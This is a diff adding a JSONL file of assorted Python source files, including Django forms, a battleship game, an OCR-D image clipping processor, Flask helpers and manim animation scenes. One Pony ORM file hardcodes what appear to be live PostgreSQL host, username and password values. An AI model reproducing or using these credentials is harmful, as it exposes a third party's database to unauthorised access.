diff --git "a/824.jsonl" "b/824.jsonl" new file mode 100644--- /dev/null +++ "b/824.jsonl" @@ -0,0 +1,552 @@ +{"seq_id":"393996814","text":"import configparser\nimport os.path\nimport re\nimport sys\nimport urllib.parse\n\nconf = configparser.ConfigParser()\nconf.read(sys.argv[1])\nsrc_array = ''\nprepare_steps = ''\nfor sec in conf.sections():\n mobj = re.match(r'^submodule \"([^\"]+)\"$', sec)\n submodule_name = mobj.group(1)\n url = conf[sec]['url']\n url = url.replace('git://', 'https://')\n path = urllib.parse.urlparse(url).path\n basename = os.path.basename(path)\n if basename.endswith('.git'):\n basename = basename[:-len('.git')]\n src_array += f'\"git+{url}\"\\n'\n prepare_steps += f'git config submodule.{submodule_name}.url \"$srcdir/{basename}\"\\n'\n\nprint(src_array)\nprint(prepare_steps)\n","sub_path":"scripts/submodule-gen.py","file_name":"submodule-gen.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"359831183","text":"from .models import Comment,Product\nfrom django import forms\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model=Comment\n fields=['text']\n widget={\n 'text':forms.Textarea()\n }\n\nclass ProductForm(forms.ModelForm):\n class Meta:\n model=Product\n fields=['title','description','price','image']\n widget={\n 'description':forms.Textarea(),\n 'price':forms.IntegerField(),\n 'title':forms.TextInput(),\n 'image':forms.URLField()\n\n }","sub_path":"ecommerce/Product/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"114447691","text":"#!/usr/bin/python\r\n# -*- coding:utf8 -*-\r\nf = file('scores.txt')\r\nlines = f.readlines()\r\n#print lines\r\nf.close()\r\n\r\nresults = [] #创建一个list,使得每得到一个学生的总成绩后,就把它添入其中。\r\n\r\nfor line in lines:\r\n #print line\r\n data = line.split()\r\n #print data\r\n\r\n sum = 0 #对于每一条数据,都新建一个字符串,把学生的名字和算好的总成绩保存进去。最后再把这些字符串一起保存到文件中\r\n for score in data[1:]:\r\n sum += int(score)\r\n result = '%s \\t: %d\\n' % (data[0], sum)\r\n #print result\r\n\r\n results.append(result) #放在循环内部,得到一个学生的总成绩后,把它添加到list中。\r\n\r\n#print results\r\noutput = file('result.txt', 'w')\r\noutput.writelines(results) #全部成绩处理完毕后,保存results中内容至文件。因为results是一个字符串组成的list,这里我们直接用writelines\r\noutput.close()","sub_path":"calculationofscoresother.py","file_name":"calculationofscoresother.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"338460640","text":"from random import randint #importina a randint method\n\nboard = []\n\nfor x in range(5):\n board.append([\"O\"] * 5) #CREATE 5*5 MATRIX\n\n\ndef print_board(board): #define a method print_board\n for row in board:\n print (\" \".join(row)) #USE TO REPLACE , WITH \"\n\n\nprint (\"Let's play Battleship!\")\nprint_board(board) #calling print_board\n\n\ndef random_row(board): #makin a function random_row\n return randint(0,len(board) - 1)\n\n\ndef random_col(board): #making a function random_col\n return randint(0,len(board[0]) - 1)\n\n\nship_row = random_row(board) #assign values to variables as ship_row and ship_col\nship_col = random_col(board)\nprint (ship_row)\nprint (ship_col)\n\nfor turn in range(4): #creating a loop which gives user 4 tries to guess the location of ship\n if turn == 3:\n print (\"Over\")\n\n else:\n print (\"Turn\", turn + 1)\n guess_row = int(input(\"Guess Row\"))\n guess_col = int(input(\"Guess_Col\"))\n\n if guess_row == ship_row and guess_col == ship_col:\n print (\"Congratulations! You sunk my battleship!\")\n break\n else:\n if (guess_row < 0 or guess_row > 4) or (guess_col < 0 or guess_col > 4):\n print (\"Oops, its not even in the ocean.\")\n elif (board[guess_row][guess_col]==\"x\"):\n print (\"You quizzed dat already.\")\n else:\n print (\"You missed my battleship\")\n board[guess_row][guess_col]=\"x\"\n print_board(board)","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"179836440","text":"from channels.asgi import get_channel_layer\n#import matplotlib.pyplot as plt\n#from mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import svm\nimport asyncio\nimport json\nimport redis\nimport pandas as pd\nimport numpy as np\ndict_of_machs = {}\n\n\nclass MlTest():\n loop = asyncio.new_event_loop()\n period = 20\n status = 'idle'\n model_mode = 'flat'\n redis_channel = redis.StrictRedis(host='localhost', port=6379, db=0)\n p = redis_channel.pubsub()\n path = '192.168.1.20'\n p.subscribe(path)\n \n data_set = pd.DataFrame(columns=['time', 'lights', 'click'])\n temp_data_time = 0\n temp_data_light = 0\n temp_data_click = 0\n ml_models = {}\n temp_X = []\n temp_y = []\n \n def __init__(self, name):\n self.name = name\n \n def calc_model(self):\n clf = svm.SVC()\n self.ml_models['ml1'] = clf.fit(self.temp_X, self.temp_y)\n \n async def get_nodes_data(self):\n while self.status != 'stop_timer':\n message = self.p.get_message()\n if message:\n try:\n parsed_data = json.loads(message['data'].decode(\"utf-8\"))\n self.temp_data_light = parsed_data['pin_light']\n print(self.temp_data_light)\n except:\n pass\n await asyncio.sleep(0.001)\n \n async def ml_timer(self):\n channels_layer = get_channel_layer()\n while self.status != 'stop_timer':\n timer = 0\n count = {}\n answer = {}\n while timer != self.period and self.status == 'run_timer':\n timer += 1\n count['timer'] = timer\n channels_layer.send_group('ml_ch', {'text': json.dumps(count)})\n self.temp_data_time = timer\n print(timer)\n \n if self.model_mode == 'learning':\n if self.temp_data_light >= 500:\n self.temp_X.append([self.temp_data_time, self.temp_data_light])\n self.temp_y.append([1])\n else:\n self.temp_X.append([self.temp_data_time, self.temp_data_light])\n self.temp_y.append([0])\n \n if self.model_mode == 'working' and 'ml1' in self.ml_models:\n answer['answer'] = str(self.ml_models['ml1'].predict([[self.temp_data_time, self.temp_data_light]])).replace(\"[\", \"\").replace(\"]\", \"\")\n print(answer['answer'])\n channels_layer.send_group('ml_ch', {'text': json.dumps(answer)})\n \n await asyncio.sleep(1)\n \n if self.status == 'stop_timer':\n self.ml_models = {}\n self.temp_X.clear()\n self.temp_y.clear()\n self.loop.stop()\n break\n \n def taped(self):\n if self.model_mode == 'learning':\n self.temp_X.append([self.temp_data_time, self.temp_data_light])\n self.temp_y.append([1])\n \n async def run(self):\n tasks = [self.ml_timer(), self.get_nodes_data()]\n await asyncio.wait(tasks)\n \n def run_maschine(self):\n asyncio.set_event_loop(self.loop)\n asyncio.ensure_future(self.run())\n self.loop.run_forever()\n \n def get_data_set(self):\n channels_layer = get_channel_layer()\n channels_layer.send_group('ml_ch', {'text': json.dumps({'raw_data_set': {'X': self.temp_X, 'y': self.temp_y}})})\n\n\ndef ml_test(request):\n print('req : ', request['text'])\n get_channel_layer().send_group('ml_ch', {'text': json.dumps('start')})\n \n if request['text'] == 'run_timer' and 'mach' not in dict_of_machs:\n dict_of_machs['mach'] = MlTest('new')\n dict_of_machs['mach'].status = 'run_timer'\n dict_of_machs['mach'].run_maschine()\n try:\n print('running_machine', dict_of_machs['mach'].name, dict_of_machs['mach'].status)\n except:\n pass\n \n if request['text'] == 'stop_timer':\n dict_of_machs['mach'].status = 'stop_timer'\n print('stopped_machine', dict_of_machs['mach'].name)\n dict_of_machs['mach'].temp_X.clear()\n dict_of_machs['mach'].temp_y.clear()\n dict_of_machs.clear()\n #del dict_of_machs['mach']\n\n try:\n print(dict_of_machs['mach'])\n print(dict_of_machs)\n except:\n print('empty!!!')\n\n if request['text'] == 'learning':\n dict_of_machs['mach'].model_mode = 'learning'\n \n if request['text'] == 'working':\n dict_of_machs['mach'].calc_model()\n dict_of_machs['mach'].model_mode = 'working'\n print(dict_of_machs['mach'].temp_X, dict_of_machs['mach'].temp_y)\n \n if request['text'] == 'taped':\n dict_of_machs['mach'].taped()\n \n if request['text'] == 'get_data_set':\n try:\n dict_of_machs['mach'].get_data_set()\n except:\n pass","sub_path":"ShelterSmartHome/apps/ml/ml_testing.py","file_name":"ml_testing.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"433746131","text":"from tkinter import *\r\nfrom PIL import ImageTk,Image\r\n\r\nroot = Tk()\r\nroot.title(\"Sliders\")\r\nroot.iconbitmap(\"C:/Users/borbe/Pictures/code.ico\")\r\nroot.geometry(\"400x400\")\r\n\r\nvar = StringVar()\r\nvar.set(\"On\")\r\n\r\ndef show():\r\n label = Label(root, text=var.get()).pack()\r\n\r\n\r\ncheckbox = Checkbutton(root, text=\"check this box ;D\", variable=var, onvalue=\"On\", offvalue=\"Off\")\r\ncheckbox.pack()\r\n\r\n\r\nbutton = Button(root, text=\"checked?\", command=show).pack()\r\n\r\nmainloop()\r\n","sub_path":"checkbox.py","file_name":"checkbox.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"598012954","text":"from __future__ import absolute_import\n\nimport os.path\nimport numpy as np\nfrom PIL import Image, ImageStat, ImageOps\nfrom scipy.ndimage import filters\nfrom shapely.geometry import Polygon\nfrom shapely.prepared import prep\n\nfrom ocrd_modelfactory import page_from_file\nfrom ocrd_models.ocrd_page import (\n MetadataItemType,\n LabelsType, LabelType,\n to_xml, AlternativeImageType\n)\nfrom ocrd import Processor\nfrom ocrd_utils import (\n getLogger,\n concat_padded,\n coordinates_of_segment,\n polygon_from_points,\n bbox_from_polygon,\n image_from_polygon,\n polygon_mask,\n crop_image,\n MIMETYPE_PAGE\n)\n\nfrom .. import get_ocrd_tool\nfrom .ocrolib import midrange, morph\nfrom .common import (\n # binarize,\n pil2array, array2pil\n)\n\nTOOL = 'ocrd-cis-ocropy-clip'\nLOG = getLogger('processor.OcropyClip')\nFALLBACK_FILEGRP_IMG = 'OCR-D-IMG-CLIP'\n\nclass OcropyClip(Processor):\n\n def __init__(self, *args, **kwargs):\n self.ocrd_tool = get_ocrd_tool()\n kwargs['ocrd_tool'] = self.ocrd_tool['tools'][TOOL]\n kwargs['version'] = self.ocrd_tool['version']\n super(OcropyClip, self).__init__(*args, **kwargs)\n if hasattr(self, 'output_file_grp'):\n try:\n self.page_grp, self.image_grp = self.output_file_grp.split(',')\n except ValueError:\n self.page_grp = self.output_file_grp\n self.image_grp = FALLBACK_FILEGRP_IMG\n LOG.info(\"No output file group for images specified, falling back to '%s'\", FALLBACK_FILEGRP_IMG)\n\n def process(self):\n \"\"\"Clip text regions / lines of the workspace at intersections with neighbours.\n\n Open and deserialise PAGE input files and their respective images,\n then iterate over the element hierarchy down to the requested\n ``level-of-operation``.\n\n Next, get each segment image according to the layout annotation (by cropping\n via coordinates into the higher-level image), as well as all its neighbours',\n binarize them (without deskewing), and make a connected component analysis.\n (Segments must not already have AlternativeImage annotated, otherwise they\n will be skipped.)\n\n Then, for each section of overlap with a neighbour, re-assign components\n which are only contained in the neighbour by clipping them to white (background),\n and export the (final) result as image file.\n\n Add the new image file to the workspace with the fileGrp USE given\n in the second position of the output fileGrp, or ``OCR-D-IMG-CLIP``,\n and an ID based on the input file and input element.\n\n Reference each new image in the AlternativeImage of the element.\n\n Produce a new output file by serialising the resulting hierarchy.\n \"\"\"\n # This makes best sense for overlapping segmentation, like current GT\n # or Tesseract layout analysis. Most notably, it can suppress graphics\n # and separators within or across a region or line. It _should_ ideally\n # be run after binarization (on page level for region-level clipping,\n # and on the region level for line-level clipping), because the\n # connected component analysis after implicit binarization could be\n # suboptimal, and the explicit binarization after clipping could be,\n # too. However, region-level clipping _must_ be run before region-level\n # deskewing, because that would make segments incomensurable with their\n # neighbours.\n level = self.parameter['level-of-operation']\n\n for (n, input_file) in enumerate(self.input_files):\n LOG.info(\"INPUT FILE %i / %s\", n, input_file.pageId or input_file.ID)\n file_id = input_file.ID.replace(self.input_file_grp, self.image_grp)\n if file_id == input_file.ID:\n file_id = concat_padded(self.image_grp, n)\n\n pcgts = page_from_file(self.workspace.download_file(input_file))\n page_id = pcgts.pcGtsId or input_file.pageId or input_file.ID # (PageType has no id)\n page = pcgts.get_Page()\n \n # add metadata about this operation and its runtime parameters:\n metadata = pcgts.get_Metadata() # ensured by from_file()\n metadata.add_MetadataItem(\n MetadataItemType(type_=\"processingStep\",\n name=self.ocrd_tool['steps'][0],\n value=TOOL,\n Labels=[LabelsType(\n externalModel=\"ocrd-tool\",\n externalId=\"parameters\",\n Label=[LabelType(type_=name,\n value=self.parameter[name])\n for name in self.parameter.keys()])]))\n \n page_image, page_coords, page_image_info = self.workspace.image_from_page(\n page, page_id, feature_selector='binarized')\n if self.parameter['dpi'] > 0:\n zoom = 300.0/self.parameter['dpi']\n elif page_image_info.resolution != 1:\n dpi = page_image_info.resolution\n if page_image_info.resolutionUnit == 'cm':\n dpi *= 2.54\n LOG.info('Page \"%s\" uses %f DPI', page_id, dpi)\n zoom = 300.0/dpi\n else:\n zoom = 1\n\n regions = list(page.get_TextRegion())\n num_texts = len(regions)\n regions += (\n page.get_AdvertRegion() +\n page.get_ChartRegion() +\n page.get_ChemRegion() +\n page.get_GraphicRegion() +\n page.get_ImageRegion() +\n page.get_LineDrawingRegion() +\n page.get_MathsRegion() +\n page.get_MusicRegion() +\n page.get_NoiseRegion() +\n page.get_SeparatorRegion() +\n page.get_TableRegion() +\n page.get_UnknownRegion())\n if not num_texts:\n LOG.warning('Page \"%s\" contains no text regions', page_id)\n background = ImageStat.Stat(page_image).median[0]\n if level == 'region':\n background_image = Image.new('L', page_image.size, background)\n page_array = pil2array(page_image)\n page_bin = np.array(page_array <= midrange(page_array), np.uint8)\n # in absolute coordinates merely for comparison/intersection\n shapes = [Polygon(polygon_from_points(region.get_Coords().points))\n for region in regions]\n # in relative coordinates for mask/cropping\n polygons = [coordinates_of_segment(region, page_image, page_coords)\n for region in regions]\n masks = [pil2array(polygon_mask(page_image, polygon)).astype(np.uint8)\n for polygon in polygons]\n for i, mask in enumerate(masks[num_texts:], num_texts):\n # for non-text regions, extend mask by 3 pixels in each direction\n # to ensure they do not leak components accidentally\n # (accounts for bad cropping of such regions in GT):\n masks[i] = filters.maximum_filter(mask, 7)\n for i, region in enumerate(regions):\n if i >= num_texts:\n break # keep non-text regions unchanged\n if level == 'region':\n if region.get_AlternativeImage():\n # FIXME: This should probably be an exception (bad workflow configuration).\n LOG.warning('Page \"%s\" region \"%s\" already contains image data: skipping',\n page_id, region.id)\n continue\n shape = prep(shapes[i])\n neighbours = [(regionj, maskj) for shapej, regionj, maskj\n in zip(shapes[:i] + shapes[i+1:],\n regions[:i] + regions[i+1:],\n masks[:i] + masks[i+1:])\n if shape.intersects(shapej)]\n if neighbours:\n self.process_segment(region, masks[i], polygons[i],\n neighbours, background_image,\n page_image, page_coords, page_bin,\n input_file.pageId, file_id + '_' + region.id)\n continue\n # level == 'line':\n lines = region.get_TextLine()\n if not lines:\n LOG.warning('Page \"%s\" region \"%s\" contains no text lines', page_id, region.id)\n continue\n region_image, region_coords = self.workspace.image_from_segment(\n region, page_image, page_coords, feature_selector='binarized')\n background_image = Image.new('L', region_image.size, background)\n region_array = pil2array(region_image)\n region_bin = np.array(region_array <= midrange(region_array), np.uint8)\n # in absolute coordinates merely for comparison/intersection\n shapes = [Polygon(polygon_from_points(line.get_Coords().points))\n for line in lines]\n # in relative coordinates for mask/cropping\n polygons = [coordinates_of_segment(line, region_image, region_coords)\n for line in lines]\n masks = [pil2array(polygon_mask(region_image, polygon)).astype(np.uint8)\n for polygon in polygons]\n for j, line in enumerate(lines):\n if line.get_AlternativeImage():\n # FIXME: This should probably be an exception (bad workflow configuration).\n LOG.warning('Page \"%s\" region \"%s\" line \"%s\" already contains image data: skipping',\n page_id, region.id, line.id)\n continue\n shape = prep(shapes[j])\n neighbours = [(linej, maskj) for shapej, linej, maskj\n in zip(shapes[:j] + shapes[j+1:],\n lines[:j] + lines[j+1:],\n masks[:j] + masks[j+1:])\n if shape.intersects(shapej)]\n if neighbours:\n self.process_segment(line, masks[j], polygons[j],\n neighbours, background_image,\n region_image, region_coords, region_bin,\n input_file.pageId, file_id + '_' + region.id + '_' + line.id)\n\n # update METS (add the PAGE file):\n file_id = input_file.ID.replace(self.input_file_grp, self.page_grp)\n if file_id == input_file.ID:\n file_id = concat_padded(self.page_grp, n)\n file_path = os.path.join(self.page_grp, file_id + '.xml')\n out = self.workspace.add_file(\n ID=file_id,\n file_grp=self.page_grp,\n pageId=input_file.pageId,\n local_filename=file_path,\n mimetype=MIMETYPE_PAGE,\n content=to_xml(pcgts))\n LOG.info('created file ID: %s, file_grp: %s, path: %s',\n file_id, self.page_grp, out.local_filename)\n\n def process_segment(self, segment, segment_mask, segment_polygon, neighbours,\n background_image, parent_image, parent_coords, parent_bin,\n page_id, file_id):\n # initialize AlternativeImage@comments classes from parent, except\n # for those operations that can apply on multiple hierarchy levels:\n features = ','.join(\n [feature for feature in parent_coords['features'].split(',')\n if feature in ['binarized', 'grayscale_normalized',\n 'despeckled', 'dewarped']]) + ',clipped'\n # mask segment within parent image:\n segment_image = image_from_polygon(parent_image, segment_polygon)\n segment_bbox = bbox_from_polygon(segment_polygon)\n for neighbour, neighbour_mask in neighbours:\n # find connected components that (only) belong to the neighbour:\n intruders = segment_mask * morph.keep_marked(parent_bin, neighbour_mask > 0) # overlaps neighbour\n intruders = morph.remove_marked(intruders, segment_mask > neighbour_mask) # but exclusively\n num_intruders = np.count_nonzero(intruders)\n num_foreground = np.count_nonzero(segment_mask * parent_bin)\n if not num_intruders:\n continue\n if num_intruders / num_foreground > 1.0 - self.parameter['min_fraction']:\n LOG.info('Too many intruders (%d/%d) from neighbour \"%s\" in segment \"%s\" on page \"%s\"',\n num_intruders, num_foreground, neighbour.id, segment.id, page_id)\n continue\n LOG.debug('segment \"%s\" vs neighbour \"%s\": suppressing %d pixels on page \"%s\"',\n segment.id, neighbour.id, np.count_nonzero(intruders), page_id)\n clip_mask = array2pil(intruders)\n segment_image.paste(background_image, mask=clip_mask) # suppress in raw image\n if segment_image.mode in ['RGB', 'L', 'RGBA', 'LA']:\n # for consumers that do not have to rely on our\n # guessed background color, but can cope with transparency:\n segment_image.putalpha(ImageOps.invert(clip_mask))\n # recrop segment into rectangle, just as image_from_segment would do\n # (and also clipping with background colour):\n segment_image = crop_image(segment_image,box=segment_bbox)\n # update METS (add the image file):\n file_path = self.workspace.save_image_file(\n segment_image,\n file_id=file_id,\n page_id=page_id,\n file_grp=self.image_grp)\n # update PAGE (reference the image file):\n segment.add_AlternativeImage(AlternativeImageType(\n filename=file_path,\n comments=features))\n","sub_path":"ocrd_cis/ocropy/clip.py","file_name":"clip.py","file_ext":"py","file_size_in_byte":14529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"502536657","text":"from openerp import models, fields, api\nfrom openerp.osv import fields, osv\nfrom openerp import tools\nfrom openerp.tools.translate import _\n\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass crm_case_section(osv.osv):\n\n _inherit = \"crm.case.section\"\n\n _columns = {}\n _defaults = {}\n\n def write(self, cr, uid, ids, vals, context=None):\n \n rtn= super(crm_case_section, self).write(cr, uid, ids, vals, context=context)\n if vals.get('member_ids'):\n user=self.pool.get('res.users')\n for member_id in vals['member_ids'][0][2]:\n _logger.info(\"member_id %r\",member_id)\n user.write( cr, uid, member_id, {'default_section_id':ids[0]}, context=None)\n\n #if vals['invoiced_forecast']:\n #self.make_challenges(cr,uid,ids) \n\n return rtn\n\n def make_challenges(self,cr,uid,section_id):\n section=self.pool.get('crm.case.section')\n #res_user=self.pool.get('res.user')\n hr_employee=self.pool.get('hr.employee')\n section_data=section.browse(cr,uid,section_id[0], context=None)\n hr_employee_id=hr_employee.search(cr,uid,[('user_id','in' ,section_data['member_ids'])], context=None)\n \n\n\n\n\n\ncrm_case_section()\n\n\n","sub_path":"section.py","file_name":"section.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"93105616","text":"from django.shortcuts import render, redirect\n# from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages\nfrom .forms import UserOurRegistration, UserUpdateForm, ProfileEdit\nfrom django.contrib.auth.decorators import login_required\n\n\ndef register(request, **kwargs):\n if request.method == 'POST':\n form = UserOurRegistration(request.POST)\n print(form)\n if form.is_valid():\n form.save(**kwargs)\n username = form.cleaned_data.get('username')\n messages.success(request,\n f'Аккаунт {username} был успешно создан!Введите имя пользователя и пароль для авторизации.')\n return redirect('user')\n else:\n form = UserOurRegistration()\n return render(request, 'users/registration.html', {'form': form, 'title': 'Страница регистрации пользователя'})\n\n\n@login_required\ndef showprofile(request, **kwargs):\n if request.method == \"POST\":\n edit_profile = ProfileEdit(request.POST, request.FILES, instance=request.user.profile)\n update_user = UserUpdateForm(request.POST, instance=request.user)\n\n if edit_profile.is_valid() and update_user.is_valid():\n edit_profile.save(**kwargs)\n update_user.save(**kwargs)\n messages.success(request, f'Аккаунт был успешно обновлен')\n return redirect('profile')\n else:\n edit_profile = ProfileEdit(instance=request.user.profile)\n update_user = UserUpdateForm(instance=request.user)\n\n data = {\n 'edit_profile': edit_profile,\n 'update_user': update_user\n }\n\n return render(request, 'users/profile.html', data)\n","sub_path":"15_lesson(django)/itProger/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"621603242","text":"\"\"\"\nhandle args from post and get\nshould also have put, delete and so on\n\"\"\"\nfrom flask import request\nfrom flask_restful import reqparse\nfrom flask_restplus import abort\nfrom werkzeug.datastructures import FileStorage\n\n\ndef get_request_args(arg_name, arg_type, required=True):\n \"\"\"\n It will get the argument value according to the name.\n And it will check whether required\n :param arg_name: the argument name\n :param arg_type: the argument type\n :param required: whether necessary\n :return: the argument value\n \"\"\"\n parser = reqparse.RequestParser()\n parser.add_argument(arg_name, type=arg_type)\n args = parser.parse_args()\n\n res = args.get(arg_name)\n\n if res is None and required:\n abort(400, \"Missing args: %s\" % arg_name)\n\n return res\n\n\ndef get_request_file(arg_name):\n \"\"\"\n Get files in the requests according to file name\n :param arg_name: the files name\n :return: list of files or None\n \"\"\"\n parser = reqparse.RequestParser()\n parser.add_argument(arg_name, location='files', type=FileStorage, action='append')\n args = parser.parse_args()\n files = args.get(arg_name)\n return files\n\n\n# get the header token\ndef get_header(req, required=True):\n token = req.headers.get('Authorization', None)\n if not token and required:\n abort(403, \"Not get the token\")\n\n return token\n\n\ndef format_str(info):\n \"\"\"\n replace ' into '' for database format\n :param info: the string\n :return: new string convert ' into ''\n \"\"\"\n return info.replace('\\'', '\\'\\'')\n","sub_path":"backend/util/request_handling.py","file_name":"request_handling.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"32095375","text":"# -*- coding: utf8 -*-\nimport mapper_triggered as Mapper\nimport datetime\nfrom qcloud_cos_v5 import CosConfig\nfrom qcloud_cos_v5 import CosS3Client\nfrom qcloud_cos_v5 import CosServiceError\nimport logging\nimport sys\nimport os\n\nregion = 'ap-guangzhou' # Modify the area according to the actual situation. 根据实际情况,修改地域\nmiddle_stage_bucket = os.environ.get('Bucket') \n\nlogging.basicConfig(level=logging.INFO, stream=sys.stdout)\nlogger = logging.getLogger()\nlogger.setLevel(level=logging.INFO)\n\n\ndef map_caller(event, context, cos_client):\n appid = event['Records'][0]['cos']['cosBucket']['appid']\n bucket = event['Records'][0]['cos']['cosBucket']['name'] +'-'+ appid\n key = event['Records'][0]['cos']['cosObject']['key']\n key = key.replace('/' + str(appid) + '/' + event['Records'][0]['cos']['cosBucket']['name'] + '/', '', 1)\n logger.info(\"Key is \" + key)\n middle_bucket = middle_stage_bucket\n middle_file_key = '/' + 'middle_' + key.split('/')[-1]\n return Mapper.do_mapping(cos_client, bucket, key, middle_bucket, middle_file_key)\n\ndef main_handler(event, context):\n logger.info(\"start main handler\")\n if \"Records\" not in event.keys():\n return {\"errorMsg\": \"event is not come from cos\"}\n\n secret_id = os.environ.get('TENCENT_SECRET_ID') # Using the secterId in environment variables. 使用环境变量中的 secretId\n secret_key = os.environ.get('TENCENT_SECRET_KEY') # Using the secretKey in environment variables. 使用环境变量中的 secretKey\n config = CosConfig(Region=region, SecretId=secret_id, SecretKey=secret_key,)\n cos_client = CosS3Client(config)\n\n start_time = datetime.datetime.now()\n res = map_caller(event, context,cos_client)\n end_time = datetime.datetime.now()\n print(\"data mapping duration: \" + str((end_time-start_time).microseconds/1000) + \"ms\")\n if res == 0:\n return \"Data mapping SUCCESS\"\n else:\n return \"Data mapping FAILED\"","sub_path":"Map_Reduce_Demo/fun_map/map_function.py","file_name":"map_function.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"40842206","text":"from pony.orm import *\r\n\r\ndb = Database()\r\n\r\nclass Restautants(db.Entity):\r\n name = Required(str, unique=True)\r\n owner = Required(str)\r\n folk = Optional(bool)\r\n\r\n def __str__(self):\r\n return str(self.name)\r\n\r\nPOSTGRES_URL = 'salt.db.elephantsql.com'\r\nPOSTGRES_USER = 'qhpmvcxf'\r\nPOSTGRES_PW = 'KVyxuSnUjHqmS8cv87HmKljukR7IKAXA'\r\nPOSTGRES_DB = 'qhpmvcxf'\r\n\r\ndb.bind(\r\n 'postgres',\r\n user=POSTGRES_USER,\r\n password=POSTGRES_PW,\r\n host=POSTGRES_URL,\r\n database=POSTGRES_DB,\r\n port='5432'\r\n)\r\n\r\ndb.generate_mapping(create_tables=True)","sub_path":"Python 3/Clase 11/flask/project/server/pony.py","file_name":"pony.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"348375769","text":"from Ag.MyCode.imports_ag import *\r\n\r\nclass MusicMai(Scene):\r\n def construct(self):\r\n txts = [\r\n \"1 购买工业标准比较高的国家和地区所生产的钢琴\",\r\n \"2 买新琴,尽量不买二手琴\",\r\n \"3 找会弹钢琴的人去试试琴,感受一下手感和音色\",\r\n ]\r\n text_vg = VGroup()\r\n for txt in txts:\r\n text = Text(txt,font=\"Microsoft YaHei Bold\",size=1)\r\n text_vg.add(text)\r\n text_vg.arrange(DOWN,aligned_edge = LEFT,buff=MED_SMALL_BUFF)\r\n\r\n for text in text_vg: \r\n self.play(Write(text))\r\n self.wait()\r\n self.wait()\r\n\r\nclass Music1(Scene):\r\n def construct(self):\r\n text1 = Text(\r\n \"三个层次\",\r\n font=\"Source Han Sans CN\",\r\n weight='BOLD',\r\n size=1.68\r\n )\r\n self.play(FadeIn(text1,scale=0.5))\r\n self.wait()\r\n text2 = TexText(\r\n \"层次一 : 欣赏音乐\",\r\n \"层次二 : 自娱自乐\",\r\n \"层次三 : 玩音乐\",\r\n )\\\r\n .arrange(\r\n DOWN,\r\n aligned_edge=LEFT\r\n )\r\n self.remove(text1)\r\n self.play(Write(text2[0]))\r\n self.wait()\r\n self.play(Write(text2[1]))\r\n self.wait()\r\n self.play(Write(text2[2]))\r\n self.wait()\r\n\r\nclass Music2(Scene):\r\n def construct(self):\r\n text1 = Text(\r\n \"旧琴练习\",\r\n font=\"Source Han Sans CN\",\r\n weight='BOLD',\r\n size=1.238\r\n ).shift(0.238*UP)\r\n\r\n text2 = Text(\r\n \"新琴练习\",\r\n font=\"Source Han Sans CN\",\r\n weight='BOLD',\r\n size=1.238\r\n ).shift(0.238*UP)\r\n\r\n self.play(FadeIn(text1,scale=0.5))\r\n self.wait()\r\n self.remove(text1)\r\n self.play(FadeIn(text2,scale=0.5))\r\n self.wait()\r\n\r\nclass Music5(Scene):\r\n def construct(self):\r\n # text1 = Text(\r\n # \"要不要把音乐作为专业发展方向?\",\r\n # font=\"思源黑体 CN Heavy\",\r\n # size=1.36\r\n # ).shift(0.238*UP)\r\n\r\n # self.play(FadeInFromLarge(text1))\r\n # self.wait()\r\n\r\n # text2 = Text(\r\n # \"艺考≠易考\",\r\n # font=\"思源黑体 CN Heavy\",\r\n # size=2.2\r\n # ).shift(0.238*UP).set_color_by_gradient(YELLOW, RED)\r\n # self.play(FadeInFromLarge(text2))\r\n # self.wait()\r\n\r\n # text3 = Text(\r\n # \"就 业 难\",\r\n # font=\"思源黑体 CN Heavy\",\r\n # size=2.2\r\n # ).shift(0.238*UP)\r\n # self.play(Write(text3))\r\n # self.wait()\r\n\r\n text1 = Text(\r\n \"如何选购钢琴?\",\r\n font=\"Microsoft YaHei Bold\",\r\n size=1.5\r\n ).shift(0.238*UP)\r\n\r\n self.play(FadeInFromLarge(text1))\r\n self.wait(2)\r\n\r\n\r\n\r\nclass Music6(Scene):\r\n def construct(self):\r\n name_chinese = Text(\"艾伦·格林斯潘\",font=\"思源黑体 CN Heavy\",size=2.2)\r\n name_english = Text(\"Alan Greenspan\",font=\"Times New Roman\",color = BLUE,size=2)\r\n birthday = Text(\"1926年3月6日-\",font=\"思源黑体 CN\",size=1.2)\r\n introduction = Text(\r\n \"第13任美国联邦储备委员会理事会主席\",\r\n font=\"思源黑体 CN Heavy\",\r\n size=1.5\r\n )\r\n all_txt = VGroup(\r\n name_chinese,\r\n name_english,\r\n birthday,\r\n introduction\r\n ).arrange(\r\n DOWN,\r\n aligned_edge=LEFT,\r\n buff = 0.5\r\n ).scale(0.36).to_corner(DL).shift(UP*0.618)\r\n ret_buff = 0.5\r\n ret = RoundedRectangle(\r\n height = 